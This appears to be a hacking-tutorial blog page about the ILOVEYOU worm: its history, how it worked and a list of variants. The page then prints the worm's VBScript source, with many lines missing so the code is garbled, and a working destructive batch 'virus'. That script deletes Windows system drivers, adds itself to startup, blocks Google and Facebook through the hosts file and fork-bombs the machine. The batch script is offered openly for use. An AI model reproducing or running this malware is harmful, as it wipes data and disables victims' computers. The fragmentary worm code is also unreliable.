Header Ads

The "ILOVEYOU" virus

About I love You Virus(Worm)

Source: http://en.wikipedia.org/wiki/AMA_Computer_University

In 1999, a student from AMA Computer College Makati named Onel de Guzman submitted a thesis proposal for the creation of a computer program that will hack into computer systems and extract vital information, particularly Internet Service accounts.[5] The proposal was unanimously rejected by the College of Computer Studies academic board. De Guzman was scheduled to complete his studies in 2000 and an academic subject called “THESIS A” was one of his final requirements before graduation. After AMA’s graduation day on May 3, 2000, an email trojan called ILOVEYOU spread all throughout the globe and caused delays in several online transactions. The “ILOVEYOU” virus unleashed a flood of e-mail that hit at least 45 million users in at least 20 countries, according to one estimate. The virus started with “ILOVEYOU” in the subject line, but several variations appeared soon afterward, including one masquerading as an e-mail joke and another as a receipt for a Mother’s Day gift. The virus both replicates itself and steals the user names and passwords of unsuspecting victims. The e-mail replies from angry virus recipients to the creator passed through a U.S. e-mail address, “isp-adm@mail.com“, which then forwarded them to the two Access.Net (Philippine Internet Service Provider) e-mail accounts used by the virus creator – “spyder@super.net.ph” and “mailme@super.net.ph“.[6]

 Onel de Guzman

The virus, according to Guinness World Records, was the most widespread computer virus of all time.[citation needed] The virus was traced to an apartment room in downtown Manila. The tenant was Onel de Guzman. Guzman was invited by the Philippines’ National Bureau of Investigation for questioning. De Guzman, in an interview, admitted spreading the virus “by accident”.[7]. In reaction to the news, AMA expelled de Guzman from AMA Makati and considered him as “drop-out” for life. The NBI charged De Guzman for violation of Republic Act 8484 or the Access Devices Regulation Act on 1998.[8] But due to lack of sufficiency the Philippine Department of Justice dropped the charges as there was no clear laws regulating the World Wide Web. Due to this incident, June 14, 2000, Republic Act 8792 known as Philippine Electronic Commerce Act of 2000 was signed.


The ILOVEYOU worm was first reported in Hong Kong on 4 May 2000 and spread westward on that day. The ILOVEYOU worm affected computers at more than half of the companies in the USA and more than 105 mail servers in Europe. Internal e-mail systems at both the U.S. Senate and Britain's House of Commons were shut down. It was estimated that the ILOVEYOU worm did more damage than any other malicious program in the history of computing: approximately US$ 9 × 109. On 4 May 2000, MessageLabs filtered ILOVEYOU from one in every 28 e-mails, the all-time highest daily infection rate seen by MessageLabs.

The ILOVEYOU incident was commonly reported as a virus in the news media, but it was actually a worm, because this malicious program did not infect other programs. I call this worm by the subject line of e-mail that propagated this worm. Norton Anti-Virus calls it VBS.Loveletter.A.

The ILOVEYOU worm arrived at the victim's computer in the form of e-mail with the ILOVEYOU subject line and an attachment. The e-mail itself was innocuous, but when the user clicked on the attachment to read the alleged love letter, LOVE-LETTER-FOR-YOU.TXT.VBS, the attachment was a Visual Basic program that performed a horrible sequence of bad things:


      deletion of files from victim's hard disk

      The worm overwrote files from the victims' hard disk drive,      specifically targeting files with extensions:

          * *.JPG, *.GIF, and *.WAV, amongst many others (i.e., files containing audio/visual data),

          * *.CSS (i.e., cascading style sheets called by HTML 4.0 documents).

          * some later versions deleted *.COM or *.EXE files,          which prevented the computer from starting when rebooted.

          * some later versions deleted *.INI files.

      The worm overwrote a copy of itself to a      file with the name of the original file, appending the extension *.VBS,      so the total number of files on the victim's hard disk would be      unchanged and the damage more difficult to immediately detect.      Further, if a victim clicked on one of these files, the ILOVEYOU worm      would be activated again on that one victim.


      By overwriting files, instead of merely deleting files, the worm      made it much more difficult (perhaps impossible) to recover the original      file on the victim's hard drive.  For example, if the worm had merely      deleted files, then the victim could restore the files from the      Recycle Bin or Trash Can.


      In addition, the worm marked files of type *.MP3 as hidden, so      they would no longer appear in directory listings, then copied the worm      to new files *.MP3.VBS.



      password theft

      The attachment LOVE-LETTER-FOR-YOU.TXT.VBS     automatically set the Microsoft Internet Explorer start page to a URL     at a web server in the Philippines, which would download     WIN-BUGSFIX.EXE to the victim's machine.


      The worm then set the victim's machine to run WIN-BUGSFIX.EXE     the next time the victim's machine was booted.


      WIN-BUGSFIX.EXE was a Trojan Horse program that collected     usernames and passwords from the victim's hard drive and e-mailed     them to an address in the Philippines, mailme@super.net.ph.     (That was a really stupid feature, since law enforcement agents,     within 12 hours of the initial release of the worm,     identified the person who owned that e-mail address.)     Furthermore, there was a copyright notice in the Trojan Horse's code!


      An Internet Service Provider in Europe alerted the web server in     the Philippines at 08:30 GMT on Thursday, 4 May 2000,     and WIN-BUGSFIX.EXE was removed from the website,     which prevented most of the harm in Europe and the USA from this     password-collecting program.     Later, the web server in the Philippines was overwhelmed     (i.e., a kind of a denial of service attack) with requests from the     worm for WIN-BUGSFIX.EXE.


      This Trojan Horse program had been previously submitted as a thesis proposal     at a computer college in the Philippines.  The proposal was rejected     with handwritten comments "This is illegal." and "We don't produce     burglars."  The student then dropped out of the college without     earning a degree.  A copy of the student's rejected thesis     proposal     is posted at Richard M. Smith's website.



      worm propagates

      The worm transmitted itself using features of the earlier     Melissa program: scanning the address book in Microsoft Outlook,     and then transmitted a copy of the ILOVEYOU e-mail to all of those     e-mail addresses.  This method of transmission rapidly disseminated     the worm to millions of victims.     In comparison, Melissa sent copies to only the first     50 entries in the Microsoft Outlook address book, while ILOVEYOU sent     copies to every address in the that victims' book.


      The worm also sent copies to other people on the same Internet Relay     Chat channel that the victim was using. Hmmm I wonder where is Onel de Guzman now.. :))

Philippine authorities filed theft and other charges against de Guzman,
but dropped them because of insufficient evidence; de Guzman says he no
longer hacks, but he still practices 'cracking,' which he describes as
gaining unauthorized access to password...

I Love You Virus Source Code

 rem  barok -loveletter(vbe) <i
hate go to school>

 rem by: spyder  /  ispyder@mail.com 
/  @GRAMMERSoft Group  /  Manila,Philippines

 On Error Resume Next

 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow



 Set fso = CreateObject("Scripting.FileSystemObject")

 set file = fso.OpenTextFile(WScript.ScriptFullname,1)



 sub main()

 On Error Resume Next

 dim wscr,rr

 set wscr=CreateObject("WScript.Shell")

Scripting Host\Settings\Timeout")

 if (rr>=1) then

 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout",0,"REG_DWORD"

 end if

 Set dirwin = fso.GetSpecialFolder(0)

 Set dirsystem = fso.GetSpecialFolder(1)

 Set dirtemp = fso.GetSpecialFolder(2)

 Set c = fso.GetFile(WScript.ScriptFullName)








 end sub

 sub regruns()

 On Error Resume Next

 Dim num,downread






Explorer\Download Directory")

 if (downread="") then


 end if

 if (fileexist(dirsystem&"\WinFAT32.exe")=1) then


 num = Int((4 * Rnd) + 1)

 if num = 1 then

 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start



 elseif num = 2 then

 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start


 elseif num = 3 then

 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start



 elseif num = 4 then

 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start



 end if

 end if

 if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then


 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet

 Explorer\Main\Start Page","about:blank"

 end if

 end sub

 sub listadriv

 On Error Resume Next

 Dim d,dc,s

 Set dc = fso.Drives

 For Each d in dc

 If d.DriveType = 2 or d.DriveType=3 Then


 end if


 listadriv = s

 end sub

 sub infectfiles(folderspec)

 On Error Resume Next

 dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

 set f = fso.GetFolder(folderspec)

 set fc = f.Files

 for each f1 in fc




 if (ext="vbs") or (ext="vbe") then

 set ap=fso.OpenTextFile(f1.path,2,true)

 ap.write vbscopy


 elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh")
or (ext="sct") or (ext="hta") then

 set ap=fso.OpenTextFile(f1.path,2,true)

 ap.write vbscopy



 set cop=fso.GetFile(f1.path)


 elseif(ext="jpg") or (ext="jpeg") then

 set ap=fso.OpenTextFile(f1.path,2,true)

 ap.write vbscopy


 set cop=fso.GetFile(f1.path)



 elseif(ext="mp3") or (ext="mp2") then

 set mp3=fso.CreateTextFile(f1.path&".vbs")

 mp3.write vbscopy


 set att=fso.GetFile(f1.path)


 end if

 if (eq<>folderspec) then

 if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini")
or (s="script.ini") or (s="mirc.hlp") then

 set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"

 scriptini.WriteLine ";mIRC Script"

 scriptini.WriteLine ";  Please dont edit this script...
mIRC will corrupt, if mIRC will"

 scriptini.WriteLine "    corrupt... WINDOWS
will affect and will not run correctly. thanks"

 scriptini.WriteLine ";"

 scriptini.WriteLine ";Khaled Mardam-Bey"

 scriptini.WriteLine ";http://www.mirc.com"

 scriptini.WriteLine ";"

 scriptini.WriteLine "n0=on 1:JOIN:#:{"

 scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt
}" scriptini.WriteLine "n2=  /.dcc send $nick


 scriptini.WriteLine "n3=}"



 end if

 end if


 end sub

 sub folderlist(folderspec)

 On Error Resume Next

 dim f,f1,sf

 set f = fso.GetFolder(folderspec)

 set sf = f.SubFolders

 for each f1 in sf




 end sub

 sub regcreate(regkey,regvalue)

 Set regedit = CreateObject("WScript.Shell")

 regedit.RegWrite regkey,regvalue

 end sub

 function regget(value)

 Set regedit = CreateObject("WScript.Shell")


 end function

 function fileexist(filespec)

 On Error Resume Next

 dim msg

 if (fso.FileExists(filespec)) Then

 msg = 0


 msg = 1

 end if

 fileexist = msg

 end function

 function folderexist(folderspec)

 On Error Resume Next

 dim msg

 if (fso.GetFolderExists(folderspec)) then

 msg = 0


 msg = 1

 end if

 fileexist = msg

 end function

 sub spreadtoemail()

 On Error Resume Next

 dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

 set regedit=CreateObject("WScript.Shell")

 set out=WScript.CreateObject("Outlook.Application")

 set mapi=out.GetNameSpace("MAPI")

 for ctrlists=1 to mapi.AddressLists.Count

 set a=mapi.AddressLists(ctrlists)


(regv="") then


 end if

 if (int(a.AddressEntries.Count)>int(regv)) then

 for ctrentries=1 to a.AddressEntries.Count




 if (regad="") then

 set male=out.CreateItem(0)


 male.Subject = "ILOVEYOU"

 male.Body = vbcrlf&"kindly check the attached LOVELETTER
coming from me."











 Set out=Nothing

 Set mapi=Nothing

 end sub

 sub html

 On Error Resume Next

 dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -

 LOVELETTER@-@>"&vbcrlf& _ "<META
CONTENT=@-@spyder ?-? ispyder@mail.com ?-?

 @GRAMMERSoft Group ?-? Manila, Philippines ?-? March
_ "<META NAME=@-@Description@-@

 CONTENT=@-@simple but i think this is



 HTM#-#,#-#main#-#)@-@ "&vbcrlf& _



 BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

 "<CENTER><p>This HTML file need ActiveX
Enable to read this HTML file<BR>- Please press #-#YES#-# button

 Enable ActiveX<?-?p>"&vbcrlf& _

 "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

"&vbcrlf& _

 "<?-?BODY><?-?HTML>"&vbcrlf& _

 "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _

 "if (window.screen){var wi=screen.availWidth;var


 "?-??-?-->"&vbcrlf& _

 "<?-?SCRIPT>"&vbcrlf& _

 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

 "on error resume next"&vbcrlf& _

_ "aw=1"&vbcrlf& _



 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _




 "wri.write code4"&vbcrlf& _

 "wri.close"&vbcrlf& _

 "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))
then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _

 "aw=0"&vbcrlf& _

 "end if"&vbcrlf& _

 "if (aw=1) then"&vbcrlf& _

 "document.write @-@ERROR: can#-#t initialize
_ "window.close"&vbcrlf& _

 "end if"&vbcrlf& _

 "end if"&vbcrlf& _

 "Set regedit =



"?-??-?-->"&vbcrlf& _








 set fso=CreateObject("Scripting.FileSystemObject")

 set c=fso.OpenTextFile(WScript.ScriptFullName,1)



 for n=0 to ubound(lines)


 lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if
(l1=n) then



 lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if


 set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")

 set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5

 d.write join(lines,vbcrlf)

 d.write vbcrlf

 d.write dt6


 end sub


Variant A (Original Virus)


Message: kindly check the attached LOVELETTER coming from me."


Special Notes: The virus begins by copying itself into the Windows directory placing Win32dll.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs. Once these files have been placed on the hard disk drive the virus will then place it self into the computer registry making the virus initiate on each of the following boots. The virus will also attempt to delete the HideSharePwds, DisablePwdCaching and DisablePwdCaching from the computer registry. Once these modifications have been made to the computer it will then send it self to each of the individuals in the address book with the Subject ILOVEYOU. To complete the destruction the destruction the virus will search out .js, .jse, .css, .wsh, .sct and .hta creating a duplicate of each of the files found with the .vbs extension. Finally it will search and delete all files with the ".jpg" and ".jpeg" (these are the most commonly found image file format on the Internet.) Next the virus will search for ".mp3" and ".mp2" files replacing all files found with ".vbs" extension and hiding the original ".mp3" and ".mp2" files.

Variant B

Subject: Susitikim shi vakara kavos puodukui...

Message: kindly check the attached LOVELETTER coming from me."


Variant C

Subject: fwd: Joke

Message: *No Message*

Attachment: VeryFunny.vbs

Variant D


Message: kindly check the attached LOVELETTER coming from me."


Special Notes: Creates registry entries as WIN- -BUGFIX.exe instead of WIN-BUGSFIX.exe.

Variant E

Subject: Mothers Day Order Confirmation

Message: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep  it in a safe place. Thanks Again and Have a Happy Mothers Day!

Attachment: Mothersday.vbs

Variant F

Subject: Dangerous Virus Warning

Message: There is a dangerous virus circulating. Please click attached picture to view it and learn to avoid it.

Attachment: virus_warning.jpg.vbs

Variant G

Subject: Virus Alert!!!

Message: Detailed message containing information about the ILOVEYOU worm.

Attachment: protect.vbs

Special Notes: Virus claims to be from support@symantec.com (which is a well known virus protection software company) this mail however of course is not from Symantec. In addition this variant of the worm will delete all files ending with .com and .bat seriously damaging the computer.

Variant H


Message: kindly check the attached LOVELETTER coming from me."


Special Notes: This virus is exactly like Variant A, except that the beginning comments that give credit to the author of the worm and information about worm have been removed.

Variant I

Subject: Important! Read carefully!!

Message: Check the attached IMPORTANT coming from me!

Attachment: Imporant.TXT.vbs

Special Notes: The beginning of the code has been changed giving credit to another author "BrainStorm / @ElectronicSouls"

Variant J

Subject: Virus Alert!!!

Message: Detailed message containing information about the ILOVEYOU worm. Appears to be same as Variant G.

Attachment: protect.vbs

Special Notes: Variant J of the ILOVEYOU worm appears to be a slightly modified version of Variant G.

Variant K

Subject: How to protect yourself from the ILOVEYOU bug!

Message: Here's the easy way to fix the love virus.

Attachment: Virus-Protection-Instructions.vbs.

Variant L

Subject: I Cant Believe This!!!

Message: I Cant Believe I have Just Received This Hate Email .. Take A Look

Attachment: KillEmAll.TXT.VBS

Special Notes: Replaces GIF & BMP images instead  of JPG & JPEG images, hides WAV & MID instead of MP3 and MP2 and copies KILER.HTM, KILLER2.VBS, KILLER1.VBS to the hard disk drive.

Variant M

Subject: Thank you For Flying with Arab Airlines

Message: Please check if the bill is correct, by opening the attached file.

Attachment: ArabAir.TXT.vbs

Special Notes: Replaces DLL & EXE files instead of JPG & JPEG files. Hides SYS & DLL files instead of MP2 and MP3 files. Copies file onto hard drive no-hate-FOR-YOU.HTM.

Variant N

Subject: Variant Test

Message: This is a Variant to the vbs virus

Attachment: IMPORTANT.TXT.vbs

Special Notes: Copies itself as sndvol32.vbs and IEAKDLL.vbs. Internet Explorer start page changes to http://astalavista.box.sk. Overwrites *.mpg, *.mpeg, *.avi, *.qt, *.qtm.

Variant O


Message: kindly check the attached LOVELETTER coming from me.


Special Notes: The script.ini has been modified slightly.

Variant P

Subject: Yeah, Yeah another time to DEATH...

Message: This is the Killer for VBS.LOVE-LETTER.WORM

Attachment: LOOK.vbs

Special Notes: Sets the Internet Explorer start page to http://www.yahoo.com/Vir-Killer.exe. Overwrites *.ZIP and *.RAR files and hides *.PAS and *.ASM files.

Variant Q

Subject: LOOK!

Message: hehe...check this out.

Attachment: LOOK.vbs

Special Notes: copies itself as MSUser32.vbs and User32DLL.vbs. Overrights *.XLS and *.MDB files. Hides *.EXE and *.LNK files. Creates a LOOK.HTM file.

Variant R

Subject: Bewerbung Kreolina

Message: Sehr geehrte Damen and Herren!

Attachment: BEWERBUNG.TXT.vbs

Special Notes: Sends BEWERBUNG.HTM into connected IRC chat rooms.

Variant S


Message: Kindly check the attached LOVELETTER coming from me.


Special Notes: Additional comment lines have been added into the virus.

Variant T

Subject: Recent Virus Attacks-Fix

Message: Attached is a copy of the script that will reverse the effects of the LOVE-LETTER-TO-YOU.TXT.vbs as well as the FW:JOKE, Mother's Day and Lithuanian siblings.

Attachment: BAND-AID.DOC.VBS

Special Notes: Sets the Internet Start page to a virus related page. Deletes *.BAT, *.GIF, *.TIF, *.TIFF, *.WAV, *.LNK, *.BAK, *.DOC, *.XLS, *.RTF, *.TXT, *.HTM, *.HTML, *.XML, *.MNY, *.ZIP, *.BMP, *.CAB and *.INF extentions.

Variant U

Subject: UOL.TXT.vbs

Message: O UOL tem um grande presente para voce, e eh exclusivo. Veja o arquivo em anexo. http://www.uol.com.br.

Attachment: UOL.TXT.vbs

Special Notes: Sets home page to http://www.uol.com.br and hides *.EXE, *.COM and *.INI files.

Variant V


Message: kindly check the attached LOVELETTER coming from me."


Special Notes: Several comment lines have been modified.

Variant W

Subject: IMPORTANT: Official virus and bug fix

Message: This is an official virus and bug fix. I got it from our system admin. It may take a short while to update your system files after you run the attachment.

Attachment: Bug and virus fix.vbs

Special Notes: Sets Internet Explorer Start Page to a virus related page. Overwrites *.EXE, *.COM, *.DLL, *.SYS, *.PWL, *.TXT.

Variant X

Subject: NEUE antivirus-Liste

Message: Hiermit senden wir Ihnen/Dir eine neue Liste mit LOVE-LETTER-VIRUS Namen, die nicht geoeffnet werden sollten, bitte sofort lesen, danke.

Attachment: antivirus-LISTE.TXT.vbs

Special Notes: Overwrites *.MDB, *.PDF, *.WSH, *.DOT, *.HTA, *.JS, *.DRV and *.INI files. Hides *.XLS and *.DOC files.

Variant Y

Subject: LOOK!

Message: hehe...check this out.

Attachment: LOOK.vbs

Special Notes: Like earlier LOOK various however hides MP3 and MP2 files.

Variant Z

Subject: BUG & VIRUS FIX

Message: I got this from our system admin. Run this to help prevent any recent or future bug & virus attacks. It may take a small while up update your files.

Attachment: MAJOR BUG & VIRUS FIX.vbs

Special Notes: Sets home page as virus related page. Overwrites *.COM, *.DLL, *.EXE, *.TXT, *.BAT and *.SYS files.

Variant "Catolina" or "Postcard" in Italian

Subject: C una cartolina per te! (Here is a postcard for you)

Message: Ciao, un tuo amico ti ha spedito una cartolina virtuale... mooolto particolare! (Hello my friend, this is a virtual post card ... very special)


Special Notes: Sets home page as http://www.vije.it an Italian music site.

Variant "BabyPic" for adults only

Subject: My baby pic!!!

Message: Its myanimated baby picture !!


Special Notes: Program written in Visual Basic with an explicit graphic animated image. When opened and viewed the virus copies itself to a local file system and sends e-mail to each MS Outlook user in the recipients' address book. The worm creates a set of files and registers them in the startup section of Windows system registry, enabling execution each time the computer starts.

The virus contains a very dangerous payload that can easily wipe out data on the computer, enable and disable on/off NumLock, CapsLock and ScrollLock keys; send buffer messages ".IM_BESIDES_YOU_" and may send one of various text messages. In addition MyBabyPic also corrupts files with .VBS, .JS, .JSE, .CSS, .WSH, .SCT, .HTA, .PBL, .CPP, .PAS, .C, .H, .JPG, .JPEG, .MP2 and MP3 extensions.

More Destructive bat Virus

Saturday, July 16, 2011 10:59 AM

 //It will cause Blue Screen of Death  , it will block google , facebook and crash windows ;)

//Credit to goes to author of virus"Ketan Singh"

Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d %0 /f > nul

Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"


cd "C:\Windows\System32\Drivers\etc"

echo facebook.com >> "Hosts"

echo www.facebook.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"

echo google.com >> "Hosts"

echo www.google.com >> "Hosts"

 del /f /q %0

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

echo start "" %0>>crash.bat

start "" crash.bat

Sites to practice your hacking skills

Some sites allow u to do legal hacking in their own network ....  where u can try your hacking skills for free and learn too u can become a  ethical hacker from Noob.

I know few sites:-


www.hackthissite.org (good for Noobs)

www.hellboundhackers.org (personally recommended)

www.haxme.org (under construction but challenges are still available)

and many more... try Google to search more


This sites contains some challenges which can be completed by using hacking skills... Try it out.

No comments

blogmytuts. Powered by Blogger.